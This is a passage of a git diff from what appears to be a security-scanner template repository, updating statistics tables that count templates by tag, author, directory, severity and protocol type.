(@tech)","count":7},{"name":"kophjager007","count":7},{"name":"meme-lord","count":7},{"name":"dr_set","count":7},{"name":"logicalhunter","count":6},{"name":"pentest_swissky","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"caspergn","count":6},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"iamnoooob","count":5},{"name":"rootxharsh","count":5},{"name":"elsfa7110","count":5},{"name":"lu4nx","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"unstabl3","count":3},{"name":"0w4ys","count":3},{"name":"binaryfigments","count":3},{"name":"fyoorer","count":3},{"name":"vsh00t","count":3},{"name":"incogbyte","count":3},{"name":"jarijaas","count":3},{"name":"tess","count":3},{"name":"z3bd","count":3},{"name":"shine","count":3},{"name":"johnk3r","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"dudez","count":3},{"name":"f1tz","count":3},{"name":"_generic_human_","count":3},{"name":"emenalf","count":3},{"name":"thomas_from_offensity","count":3},{"name":"skeltavik","count":3},{"name":"shifacyclewala","count":3},{"name":"impramodsargar","count":3},{"name":"idealphase","count":3},{"name":"mavericknerd","count":3},{"name":"sushantkamble","count":3},{"name":"hetroublemakr","count":2},{"name":"socketz","count":2},{"name":"lotusdll","count":2},{"name":"johnjhacking","count":2},{"name":"moritz nentwig","count":2},{"name":"randomrobbie","count":2},{"name":"vavkamil","count":2},{"name":"nkxxkn","count":2},{"name":"cocxanh","count":2},{"name":"afaq","count":2},{"name":"joeldeleep","count":2},{"name":"sullo","count":2},{"name":"pxmme1337","count":2},{"name":"alifathi-h1","count":2},{"name":"swissky","count":2},{"name":"bsysop","count":2},{"name":"arcc","count":2},{"name":"mohammedsaneem","count":2},{"name":"ree4pwn","count":2},{"name":"bernardofsr","count":2},{"name":"gal nagli","count":2},{"name":"0xsapra","count":2},{"name":"g4l1t0","count":2},{"name":"bp0lr","count":2},{"name":"w4cky_","count":2},{"name":"koti2","count":2},{"name":"dheerajmadhukar","count":2},{"name":"fabaff","count":2},{"name":"davidmckennirey","count":2},{"name":"manas_harsh","count":2},{"name":"r3naissance","count":2},{"name":"huowuzhao","count":2},{"name":"whoever","count":2},{"name":"ehsahil","count":2},{"name":"zomsop82","count":2},{"name":"0xsmiley","count":2},{"name":"0xprial","count":2},{"name":"kiblyn11","count":2},{"name":"foulenzer","count":2},{"name":"amsda","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"convisoappsec","count":2},{"name":"gevakun","count":2},{"name":"0xelkomy","count":2},{"name":"x1m_martijn","count":2},{"name":"hahwul","count":2},{"name":"parth","count":2},{"name":"0xcrypto","count":2},{"name":"0xrudra","count":2},{"name":"udit_thakkur","count":2},{"name":"random-robbie","count":2},{"name":"bing0o","count":2},{"name":"revblock","count":1},{"name":"adrianmf","count":1},{"name":"me9187","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"borna nematzadeh","count":1},{"name":"@dwisiswant0","count":1},{"name":"iampritam","count":1},{"name":"c3l3si4n","count":1},{"name":"sicksec","count":1},{"name":"luskabol","count":1},{"name":"ringo","count":1},{"name":"thezakman","count":1},{"name":"deena","count":1},{"name":"raesene","count":1},{"name":"shelld3v","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"zhenwarx","count":1},{"name":"affix","count":1},{"name":"jteles","count":1},{"name":"ahmetpergamum","count":1},{"name":"taielab","count":1},{"name":"notsoevilweasel","count":1},{"name":"ahmed sherif","count":1},{"name":"aresx","count":1},{"name":"pdp","count":1},{"name":"hanlaomo","count":1},{"name":"mhdsamx","count":1},{"name":"zandros0","count":1},{"name":"akash.c","count":1},{"name":"_darrenmartyn","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"infosecsanyam","count":1},{"name":"kurohost","count":1},{"name":"alph4byt3","count":1},{"name":"nytr0gen","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"undefl0w","count":1},{"name":"sshell","count":1},{"name":"jeya seelan","count":1},{"name":"intx0x80","count":1},{"name":"tirtha_mandal","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"ipanda","count":1},{"name":"ooooooo_q","count":1},{"name":"alperenkesk","count":1},{"name":"rodnt","count":1},{"name":"toufik airane","count":1},{"name":"absshax","count":1},{"name":"akshansh","count":1},{"name":"micha3lb3n","count":1},{"name":"furkansenan","count":1},{"name":"thevillagehacker","count":1},{"name":"yashanand155","count":1},{"name":"willd96","count":1},{"name":"yavolo","count":1},{"name":"_harleo","count":1},{"name":"flag007","count":1},{"name":"mass0ma","count":1},{"name":"noamrathaus","count":1},{"name":"oscarintherocks","count":1},{"name":"52971","count":1},{"name":"sec_hawk","count":1},{"name":"evolutionsec","count":1},{"name":"b4uh0lz","count":1},{"name":"pratik khalane","count":1},{"name":"andirrahmani1","count":1},{"name":"shifacyclewla","count":1},{"name":"kabirsuda","count":1},{"name":"petruknisme","count":1},{"name":"philippdelteil","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"geraldino2","count":1},{"name":"nerrorsec","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"ilovebinbash","count":1},{"name":"schniggie","count":1},{"name":"wabafet","count":1},{"name":"kre80r","count":1},{"name":"divya_mudgal","count":1},{"name":"hakluke","count":1},{"name":"juicypotato1","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"alex","count":1},{"name":"blckraven","count":1},{"name":"dawid-czarnecki","count":1},{"name":"_c0wb0y_","count":1},{"name":"yashgoti","count":1},{"name":"whynotke","count":1},{"name":"bjhulst","count":1},{"name":"defr0ggy","count":1},{"name":"sy3omda","count":1},{"name":"th3.d1p4k","count":1},{"name":"chron0x","count":1},{"name":"manuelbua","count":1},{"name":"vzamanillo","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"rojanrijal","count":1},{"name":"naglinagli","count":1},{"name":"qlkwej","count":1},{"name":"fmunozs","count":1},{"name":"elder tao","count":1},{"name":"makyotox","count":1},{"name":"0xtavian","count":1},{"name":"d0rkerdevil","count":1},{"name":"bolli95","count":1},{"name":"co0nan","count":1},{"name":"un-fmunozs","count":1},{"name":"udyz","count":1},{"name":"sickwell","count":1},{"name":"apt-mirror","count":1},{"name":"its0x08","count":1},{"name":"luci","count":1},{"name":"b0yd","count":1},{"name":"0xteles","count":1},{"name":"becivells","count":1},{"name":"streetofhackerr007","count":1},{"name":"0xrod","count":1},{"name":"j33n1k4","count":1},{"name":"b0rn2r00t","count":1},{"name":"patralos","count":1},{"name":"knassar702","count":1},{"name":"remonsec","count":1},{"name":"izn0u","count":1},{"name":"cookiehanhoan","count":1},{"name":"fopina","count":1},{"name":"mesaglio","count":1},{"name":"ajaysenr","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"push4d","count":1},{"name":"ldionmarcil","count":1},{"name":"xstp","count":1},{"name":"ohlinge","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"soyelmago","count":1},{"name":"elmahdi","count":1},{"name":"retr0","count":1},{"name":"brabbit10","count":1},{"name":"berkdusunur","count":1},{"name":"exploitation","count":1},{"name":"0h1in9e","count":1},{"name":"x6263","count":1},{"name":"tim_koopmans","count":1},{"name":"kareemse1im","count":1},{"name":"mubassirpatel","count":1},{"name":"bad5ect0r","count":1},{"name":"s1r1u5_","count":1},{"name":"mah3sec_","count":1},{"name":"gboddin","count":1},{"name":"daviey","count":1},{"name":"andysvints","count":1},{"name":"rotemreiss","count":1},{"name":"0ut0fb4nd","count":1},{"name":"pudsec","count":1},{"name":"regala_","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"smaranchand","count":1},{"name":"shreyapohekar","count":1},{"name":"omarkurt","count":1}],"directory":[{"name":"cves","count":739},{"name":"vulnerabilities","count":307},{"name":"exposed-panels","count":250},{"name":"technologies","count":192},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":37},{"name":"network","count":33},{"name":"iot","count":25},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":650},{"name":"high","count":560},{"name":"medium","count":456},{"name":"critical","count":276},{"name":"low","count":154}],"types":[{"name":"http","count":1991},{"name":"file","count":46},{"name":"network","count":42},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 4db6036e00..517ec10c3f 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,818 +1,825 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 725 | pikpikcu | 273 | cves | 725 | info | 643 | http | 1965 | -| lfi | 260 | dhiyaneshdk | 258 | vulnerabilities | 301 | high | 553 | file | 46 | -| panel | 248 | daffainfo | 213 | exposed-panels | 247 | medium | 448 | network | 41 | -| xss | 244 | pdteam | 195 | technologies | 191 | critical | 273 | dns | 12 | -| exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | | -| wordpress | 223 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 198 | gy741 | 72 | takeovers | 64 | | | | | -| tech | 181 | pussycat0x | 67 | default-logins | 56 | | | | | -| cve2020 | 164 | madrobot | 61 | file | 46 | | | | | -| wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | -| cve2021 | 127 | gaurang | 42 | network | 32 | | | | | -| cve2019 | 96 | 0x_akoko | 39 | miscellaneous | 24 | | | | | -| config | 94 | ice3man | 26 | iot | 23 | | | | | -| cve2018 | 85 | philippedelteil | 25 | dns | 12 | | | | | +| cve | 739 | pikpikcu | 273 | cves | 739 | info | 650 | http | 1991 | +| lfi | 266 | dhiyaneshdk | 268 | vulnerabilities | 307 | high | 560 | file | 46 | +| panel | 252 | daffainfo | 217 | exposed-panels | 250 | medium | 456 | network | 42 | +| xss | 248 | pdteam | 195 | technologies | 192 | critical | 276 | dns | 12 | +| wordpress | 235 | geeknik | 154 | exposures | 188 | low | 154 | | | +| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| rce | 200 | gy741 | 76 | takeovers | 64 | | | | | +| tech | 183 | pussycat0x | 69 | default-logins | 56 | | | | | +| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | +| wp-plugin | 161 | madrobot | 61 | workflows | 37 | | | | | +| cve2021 | 138 | 0x_akoko | 43 | network | 33 | | | | | +| cve2019 | 96 | gaurang | 42 | iot | 25 | | | | | +| config | 94 | philippedelteil | 27 | miscellaneous | 24 | | | | | +| cve2018 | 86 | ice3man | 26 | dns | 12 | | | | | | joomla | 79 | organiccrap | 24 | fuzzing | 10 | | | | | | apache | 70 | sheikhrishad | 15 | cnvd | 9 | | | | | -| cve2010 | 69 | milo2012 | 14 | headless | 5 | | | | | -| takeover | 68 | pr3r00t | 14 | | | | | | | -| token | 65 | techbrunchfr | 13 | | | | | | | -| default-login | 63 | suman_kar | 12 | | | | | | | -| iot | 62 | r3dg33k | 11 | | | | | | | -| oob | 53 | cyllective | 11 | | | | | | | -| cve2017 | 50 | righettod | 10 | | | | | | | +| cve2010 | 69 | pr3r00t | 14 | headless | 5 | | | | | +| takeover | 68 | milo2012 | 14 | | | | | | | +| iot | 66 | techbrunchfr | 13 | | | | | | | +| token | 65 | suman_kar | 12 | | | | | | | +| default-login | 63 | r3dg33k | 11 | | | | | | | +| oob | 55 | cyllective | 11 | | | | | | | +| cve2017 | 50 | random_robbie | 10 | | | | | | | | unauth | 47 | wdahlenb | 10 | | | | | | | -| file | 46 | random_robbie | 10 | | | | | | | -| network | 41 | hackergautam | 9 | | | | | | | -| sqli | 38 | melbadry9 | 9 | | | | | | | -| ssrf | 37 | nadino | 9 | | | | | | | -| oracle | 36 | that_juan_ | 8 | | | | | | | -| cve2016 | 36 | aashiq | 8 | | | | | | | -| | 36 | iamthefrogy | 8 | | | | | | | -| redirect | 33 | kophjager007 | 7 | | | | | | | -| logs | 30 | randomstr1ng | 7 | | | | | | | +| file | 46 | righettod | 10 | | | | | | | +| network | 42 | hackergautam | 9 | | | | | | | +| sqli | 38 | nadino | 9 | | | | | | | +| ssrf | 37 | melbadry9 | 9 | | | | | | | +| | 37 | that_juan_ | 8 | | | | | | | +| oracle | 36 | aashiq | 8 | | | | | | | +| cve2016 | 36 | iamthefrogy | 8 | | | | | | | +| redirect | 34 | dr_set | 7 | | | | | | | +| logs | 30 | techryptic (@tech) | 7 | | | | | | | | jira | 28 | emadshanab | 7 | | | | | | | -| atlassian | 27 | techryptic (@tech) | 7 | | | | | | | -| listing | 27 | dr_set | 7 | | | | | | | -| misc | 23 | dogasantos | 7 | | | | | | | -| cve2015 | 23 | 0x240x23elu | 7 | | | | | | | -| disclosure | 21 | harshbothra_ | 7 | | | | | | | -| auth-bypass | 20 | oppsec | 7 | | | | | | | -| generic | 20 | meme-lord | 7 | | | | | | | -| cisco | 19 | caspergn | 6 | | | | | | | -| router | 19 | logicalhunter | 6 | | | | | | | -| aem | 19 | __fazal | 6 | | | | | | | -| misconfig | 18 | pentest_swissky | 6 | | | | | | | -| sap | 18 | puzzlepeaches | 6 | | | | | | | -| cve2014 | 18 | elsfa7110 | 5 | | | | | | | -| debug | 18 | rootxharsh | 5 | | | | | | | -| springboot | 18 | panch0r3d | 5 | | | | | | | -| php | 16 | yanyun | 5 | | | | | | | -| fuzz | 14 | ganofins | 5 | | | | | | | -| struts | 14 | iamnoooob | 5 | | | | | | | -| weblogic | 14 | joanbono | 5 | | | | | | | -| login | 14 | nodauf | 4 | | | | | | | -| cve2011 | 14 | xelkomy | 4 | | | | | | | -| cve2012 | 14 | e_schultze_ | 4 | | | | | | | -| adobe | 13 | lu4nx | 4 | | | | | | | -| devops | 13 | github.com/its0x08 | 4 | | | | | | | -| dns | 13 | johnk3r | 3 | | | | | | | -| zoho | 13 | unstabl3 | 3 | | | | | | | -| android | 13 | jarijaas | 3 | | | | | | | -| jenkins | 12 | shifacyclewala | 3 | | | | | | | -| dlink | 12 | incogbyte | 3 | | | | | | | -| aws | 12 | vsh00t | 3 | | | | | | | -| manageengine | 12 | tess | 3 | | | | | | | -| cve2013 | 11 | thomas_from_offensity | 3 | | | | | | | -| wp-theme | 11 | impramodsargar | 3 | | | | | | | -| dell | 10 | fyoorer | 3 | | | | | | | -| xxe | 10 | z3bd | 3 | | | | | | | -| magento | 9 | mavericknerd | 3 | | | | | | | -| intrusive | 9 | 0w4ys | 3 | | | | | | | -| ftp | 9 | skeltavik | 3 | | | | | | | +| listing | 27 | harshbothra_ | 7 | | | | | | | +| atlassian | 27 | 0x240x23elu | 7 | | | | | | | +| cve2015 | 24 | oppsec | 7 | | | | | | | +| misc | 23 | randomstr1ng | 7 | | | | | | | +| disclosure | 22 | meme-lord | 7 | | | | | | | +| auth-bypass | 21 | dogasantos | 7 | | | | | | | +| cisco | 20 | kophjager007 | 7 | | | | | | | +| generic | 20 | puzzlepeaches | 6 | | | | | | | +| aem | 19 | caspergn | 6 | | | | | | | +| cve2014 | 19 | __fazal | 6 | | | | | | | +| router | 19 | pentest_swissky | 6 | | | | | | | +| sap | 18 | logicalhunter | 6 | | | | | | | +| debug | 18 | ganofins | 5 | | | | | | | +| springboot | 18 | elsfa7110 | 5 | | | | | | | +| misconfig | 18 | panch0r3d | 5 | | | | | | | +| php | 16 | rootxharsh | 5 | | | | | | | +| login | 14 | joanbono | 5 | | | | | | | +| fuzz | 14 | iamnoooob | 5 | | | | | | | +| cve2011 | 14 | yanyun | 5 | | | | | | | +| weblogic | 14 | lu4nx | 4 | | | | | | | +| cve2012 | 14 | nodauf | 4 | | | | | | | +| struts | 14 | github.com/its0x08 | 4 | | | | | | | +| zoho | 13 | e_schultze_ | 4 | | | | | | | +| android | 13 | xelkomy | 4 | | | | | | | +| dns | 13 | emenalf | 3 | | | | | | | +| devops | 13 | sushantkamble | 3 | | | | | | | +| adobe | 13 | idealphase | 3 | | | | | | | +| aws | 12 | jarijaas | 3 | | | | | | | +| manageengine | 12 | impramodsargar | 3 | | | | | | | +| jenkins | 12 | mavericknerd | 3 | | | | | | | +| dlink | 12 | vsh00t | 3 | | | | | | | +| wp-theme | 11 | incogbyte | 3 | | | | | | | +| cve2013 | 11 | binaryfigments | 3 | | | | | | | +| dell | 10 | z3bd | 3 | | | | | | | +| xxe | 10 | skeltavik | 3 | | | | | | | +| ftp | 9 | dudez | 3 | | | | | | | +| intrusive | 9 | thomas_from_offensity | 3 | | | | | | | +| magento | 9 | fyoorer | 3 | | | | | | | +| airflow | 8 | shifacyclewala | 3 | | | | | | | +| cnvd | 8 | johnk3r | 3 | | | | | | | +| vmware | 8 | _generic_human_ | 3 | | | | | | | +| rails | 8 | tess | 3 | | | | | | | +| nginx | 8 | 0w4ys | 3 | | | | | | | | gitlab | 8 | yash anand @yashanand155 | 3 | | | | | | | -| scada | 8 | f1tz | 3 | | | | | | | -| rails | 8 | dudez | 3 | | | | | | | -| vmware | 8 | emenalf | 3 | | | | | | | -| ruijie | 8 | binaryfigments | 3 | | | | | | | -| cnvd | 8 | sushantkamble | 3 | | | | | | | -| airflow | 8 | _generic_human_ | 3 | | | | | | | -| nginx | 8 | idealphase | 3 | | | | | | | -| google | 7 | shine | 3 | | | | | | | -| ibm | 7 | johnjhacking | 2 | | | | | | | -| cms | 7 | whoever | 2 | | | | | | | -| backup | 7 | pxmme1337 | 2 | | | | | | | -| coldfusion | 7 | randomrobbie | 2 | | | | | | | -| microsoft | 7 | 0xcrypto | 2 | | | | | | | -| netgear | 7 | arcc | 2 | | | | | | | -| cve2009 | 7 | lotusdll | 2 | | | | | | | -| files | 7 | joeldeleep | 2 | | | | | | | -| confluence | 7 | amsda | 2 | | | | | | | -| kubernetes | 7 | g4l1t0 | 2 | | | | | | | -| api | 6 | manas_harsh | 2 | | | | | | | -| django | 6 | hetroublemakr | 2 | | | | | | | -| solr | 6 | davidmckennirey | 2 | | | | | | | -| laravel | 6 | 0xelkomy | 2 | | | | | | | -| rconfig | 6 | kiblyn11 | 2 | | | | | | | -| cve2008 | 6 | koti2 | 2 | | | | | | | -| citrix | 6 | bing0o | 2 | | | | | | | -| jetty | 6 | alifathi-h1 | 2 | | | | | | | -| docker | 6 | udit_thakkur | 2 | | | | | | | -| ssti | 5 | r3naissance | 2 | | | | | | | -| java | 5 | cocxanh | 2 | | | | | | | -| windows | 5 | hahwul | 2 | | | | | | | -| lucee | 5 | random-robbie | 2 | | | | | | | -| dedecms | 5 | socketz | 2 | | | | | | | -| circarlife | 5 | w4cky_ | 2 | | | | | | | -| printer | 5 | bernardofsr | 2 | | | | | | | -| phpmyadmin | 5 | x1m_martijn | 2 | | | | | | | -| hp | 5 | parth | 2 | | | | | | | -| iis | 5 | afaq | 2 | | | | | | | -| drupal | 5 | bsysop | 2 | | | | | | | -| headless | 5 | bp0lr | 2 | | | | | | | -| nodejs | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| deserialization | 5 | 0xprial | 2 | | | | | | | -| tomcat | 5 | ehsahil | 2 | | | | | | | -| fileupload | 5 | mohammedsaneem | 2 | | | | | | | -| jolokia | 5 | fabaff | 2 | | | | | | | -| grafana | 4 | gevakun | 2 | | | | | | | -| asp | 4 | swissky | 2 | | | | | | | -| samsung | 4 | zomsop82 | 2 | | | | | | | -| artifactory | 4 | nkxxkn | 2 | | | | | | | -| solarwinds | 4 | 0xsmiley | 2 | | | | | | | -| exchange | 4 | 0xsapra | 2 | | | | | | | -| traversal | 4 | vavkamil | 2 | | | | | | | -| firmware | 4 | huowuzhao | 2 | | | | | | | -| symfony | 4 | foulenzer | 2 | | | | | | | -| resin | 4 | convisoappsec | 2 | | | | | | | -| moodle | 4 | dheerajmadhukar | 2 | | | | | | | -| symantec | 4 | 0xrudra | 2 | | | | | | | -| camera | 4 | ree4pwn | 2 | | | | | | | -| strapi | 4 | moritz nentwig | 2 | | | | | | | -| webserver | 4 | gal nagli | 2 | | | | | | | -| thinkcmf | 4 | wabafet | 1 | | | | | | | -| magmi | 4 | affix | 1 | | | | | | | -| wso2 | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| vpn | 4 | gboddin | 1 | | | | | | | -| git | 4 | shreyapohekar | 1 | | | | | | | -| proxy | 4 | j33n1k4 | 1 | | | | | | | -| hongdian | 4 | hakluke | 1 | | | | | | | -| buffalo | 4 | dawid-czarnecki | 1 | | | | | | | -| zabbix | 4 | @dwisiswant0 | 1 | | | | | | | -| thinkphp | 4 | ratnadip gajbhiye | 1 | | | | | | | -| glpi | 4 | b0rn2r00t | 1 | | | | | | | -| zimbra | 4 | ldionmarcil | 1 | | | | | | | -| crlf | 4 | juicypotato1 | 1 | | | | | | | -| elastic | 4 | sickwell | 1 | | | | | | | -| kevinlab | 3 | mass0ma | 1 | | | | | | | -| log | 3 | 0xtavian | 1 | | | | | | | -| itop | 3 | sy3omda | 1 | | | | | | | -| fpd | 3 | s1r1u5_ | 1 | | | | | | | -| bigip | 3 | soyelmago | 1 | | | | | | | -| ssh | 3 | b4uh0lz | 1 | | | | | | | -| r-seenet | 3 | schniggie | 1 | | | | | | | -| ebs | 3 | co0nan | 1 | | | | | | | -| terramaster | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| targa | 3 | ipanda | 1 | | | | | | | -| smtp | 3 | elder tao | 1 | | | | | | | -| zhiyuan | 3 | cookiehanhoan | 1 | | | | | | | -| prometheus | 3 | 0ut0fb4nd | 1 | | | | | | | -| opensis | 3 | willd96 | 1 | | | | | | | -| microstrategy | 3 | borna nematzadeh | 1 | | | | | | | -| openam | 3 | vzamanillo | 1 | | | | | | | -| injection | 3 | tirtha_mandal | 1 | | | | | | | -| fanruan | 3 | streetofhackerr007 | 1 | | | | | | | -| httpd | 3 | kareemse1im | 1 | | | | | | | -| nexus | 3 | sullo | 1 | | | | | | | -| lfr | 3 | kabirsuda | 1 | | | | | | | -| jellyfin | 3 | toufik airane | 1 | | | | | | | -| ofbiz | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| openssh | 3 | andysvints | 1 | | | | | | | -| caucho | 3 | shifacyclewla | 1 | | | | | | | -| npm | 3 | noamrathaus | 1 | | | | | | | -| vbulletin | 3 | zandros0 | 1 | | | | | | | -| bitrix | 3 | remonsec | 1 | | | | | | | -| nosqli | 3 | izn0u | 1 | | | | | | | -| mail | 3 | berkdusunur | 1 | | | | | | | -| amazon | 3 | x6263 | 1 | | | | | | | -| springcloud | 3 | thezakman | 1 | | | | | | | -| kafka | 3 | luskabol | 1 | | | | | | | +| scada | 8 | shine | 3 | | | | | | | +| ruijie | 8 | unstabl3 | 3 | | | | | | | +| google | 7 | f1tz | 3 | | | | | | | +| coldfusion | 7 | arcc | 2 | | | | | | | +| cve2009 | 7 | whoever | 2 | | | | | | | +| netgear | 7 | hahwul | 2 | | | | | | | +| kubernetes | 7 | foulenzer | 2 | | | | | | | +| cms | 7 | gevakun | 2 | | | | | | | +| files | 7 | swissky | 2 | | | | | | | +| ibm | 7 | zomsop82 | 2 | | | | | | | +| backup | 7 | 0xsmiley | 2 | | | | | | | +| confluence | 7 | cocxanh | 2 | | | | | | | +| microsoft | 7 | hetroublemakr | 2 | | | | | | | +| laravel | 6 | parth | 2 | | | | | | | +| citrix | 6 | lotusdll | 2 | | | | | | | +| camera | 6 | amsda | 2 | | | | | | | +| rconfig | 6 | sullo | 2 | | | | | | | +| api | 6 | pxmme1337 | 2 | | | | | | | +| cve2008 | 6 | 0xrudra | 2 | | | | | | | +| django | 6 | 0xsapra | 2 | | | | | | | +| solr | 6 | bsysop | 2 | | | | | | | +| docker | 6 | koti2 | 2 | | | | | | | +| jetty | 6 | manas_harsh | 2 | | | | | | | +| dedecms | 5 | mohammedsaneem | 2 | | | | | | | +| hp | 5 | davidmckennirey | 2 | | | | | | | +| jolokia | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| lucee | 5 | udit_thakkur | 2 | | | | | | | +| nodejs | 5 | r3naissance | 2 | | | | | | | +| printer | 5 | random-robbie | 2 | | | | | | | +| fileupload | 5 | kiblyn11 | 2 | | | | | | | +| phpmyadmin | 5 | moritz nentwig | 2 | | | | | | | +| deserialization | 5 | vavkamil | 2 | | | | | | | +| headless | 5 | g4l1t0 | 2 | | | | | | | +| tomcat | 5 | fabaff | 2 | | | | | | | +| drupal | 5 | 0xelkomy | 2 | | | | | | | +| windows | 5 | ree4pwn | 2 | | | | | | | +| java | 5 | bp0lr | 2 | | | | | | | +| iis | 5 | socketz | 2 | | | | | | | +| circarlife | 5 | joeldeleep | 2 | | | | | | | +| ssti | 5 | x1m_martijn | 2 | | | | | | | +| exchange | 4 | convisoappsec | 2 | | | | | | | +| glpi | 4 | 0xprial | 2 | | | | | | | +| traversal | 4 | randomrobbie | 2 | | | | | | | +| magmi | 4 | alifathi-h1 | 2 | | | | | | | +| moodle | 4 | bernardofsr | 2 | | | | | | | +| vpn | 4 | johnjhacking | 2 | | | | | | | +| strapi | 4 | huowuzhao | 2 | | | | | | | +| zabbix | 4 | dheerajmadhukar | 2 | | | | | | | +| git | 4 | nkxxkn | 2 | | | | | | | +| thinkphp | 4 | w4cky_ | 2 | | | | | | | +| zimbra | 4 | bing0o | 2 | | | | | | | +| thinkcmf | 4 | ehsahil | 2 | | | | | | | +| rfi | 4 | 0xcrypto | 2 | | | | | | | +| resin | 4 | gal nagli | 2 | | | | | | | +| webserver | 4 | afaq | 2 | | | | | | | +| wso2 | 4 | kabirsuda | 1 | | | | | | | +| symantec | 4 | pratik khalane | 1 | | | | | | | +| symfony | 4 | flag007 | 1 | | | | | | | +| buffalo | 4 | retr0 | 1 | | | | | | | +| proxy | 4 | whynotke | 1 | | | | | | | +| hongdian | 4 | yavolo | 1 | | | | | | | +| solarwinds | 4 | ahmed sherif | 1 | | | | | | | +| samsung | 4 | ratnadip gajbhiye | 1 | | | | | | | +| elastic | 4 | omarkurt | 1 | | | | | | | +| crlf | 4 | kba@sogeti_esec | 1 | | | | | | | +| artifactory | 4 | mass0ma | 1 | | | | | | | +| firmware | 4 | d0rkerdevil | 1 | | | | | | | +| asp | 4 | sec_hawk | 1 | | | | | | | +| grafana | 4 | 0xteles | 1 | | | | | | | +| druid | 3 | luskabol | 1 | | | | | | | +| ssh | 3 | tirtha_mandal | 1 | | | | | | | +| lfr | 3 | divya_mudgal | 1 | | | | | | | +| microstrategy | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| cacti | 3 | taielab | 1 | | | | | | | +| bitrix | 3 | un-fmunozs | 1 | | | | | | | +| targa | 3 | adrianmf | 1 | | | | | | | +| smtp | 3 | aceseven (digisec360) | 1 | | | | | | | | jeesns | 3 | aresx | 1 | | | | | | | -| nacos | 3 | deena | 1 | | | | | | | -| firebase | 3 | pdp | 1 | | | | | | | -| linkerd | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| zhiyuan | 3 | streetofhackerr007 | 1 | | | | | | | +| nacos | 3 | hanlaomo | 1 | | | | | | | +| kafka | 3 | bad5ect0r | 1 | | | | | | | +| oa | 3 | _darrenmartyn | 1 | | | | | | | +| injection | 3 | j33n1k4 | 1 | | | | | | | +| fpd | 3 | thezakman | 1 | | | | | | | +| springcloud | 3 | 0xtavian | 1 | | | | | | | +| fanruan | 3 | c3l3si4n | 1 | | | | | | | +| vbulletin | 3 | mah3sec_ | 1 | | | | | | | +| bigip | 3 | apt-mirror | 1 | | | | | | | +| slack | 3 | petruknisme | 1 | | | | | | | +| caucho | 3 | elder tao | 1 | | | | | | | +| jellyfin | 3 | rodnt | 1 | | | | | | | +| openam | 3 | j3ssie/geraldino2 | 1 | | | | | | | +| ebs | 3 | qlkwej | 1 | | | | | | | +| kevinlab | 3 | defr0ggy | 1 | | | | | | | +| opensis | 3 | akshansh | 1 | | | | | | | +| tikiwiki | 3 | iampritam | 1 | | | | | | | +| terramaster | 3 | willd96 | 1 | | | | | | | +| linkerd | 3 | raesene | 1 | | | | | | | +| telerik | 3 | x6263 | 1 | | | | | | | +| azure | 3 | exploitation | 1 | | | | | | | +| nosqli | 3 | elmahdi | 1 | | | | | | | +| nexus | 3 | co0nan | 1 | | | | | | | +| mail | 3 | fopina | 1 | | | | | | | +| amazon | 3 | 52971 | 1 | | | | | | | +| kibana | 3 | nytr0gen | 1 | | | | | | | +| npm | 3 | th3.d1p4k | 1 | | | | | | | +| mongodb | 3 | zhenwarx | 1 | | | | | | | +| itop | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| druid | 3 | adrianmf | 1 | | | | | | | -| oa | 3 | th3.d1p4k | 1 | | | | | | | -| telerik | 3 | mesaglio | 1 | | | | | | | -| hoteldruid | 3 | iampritam | 1 | | | | | | | -| kibana | 3 | _harleo | 1 | | | | | | | -| mongodb | 3 | kre80r | 1 | | | | | | | -| backups | 3 | revblock | 1 | | | | | | | -| slack | 3 | notsoevilweasel | 1 | | | | | | | -| tikiwiki | 3 | qlkwej | 1 | | | | | | | -| cacti | 3 | fopina | 1 | | | | | | | -| ucmdb | 2 | ahmetpergamum | 1 | | | | | | | -| node | 2 | its0x08 | 1 | | | | | | | -| service | 2 | 0xrod | 1 | | | | | | | -| avantfax | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| waf | 2 | jeya seelan 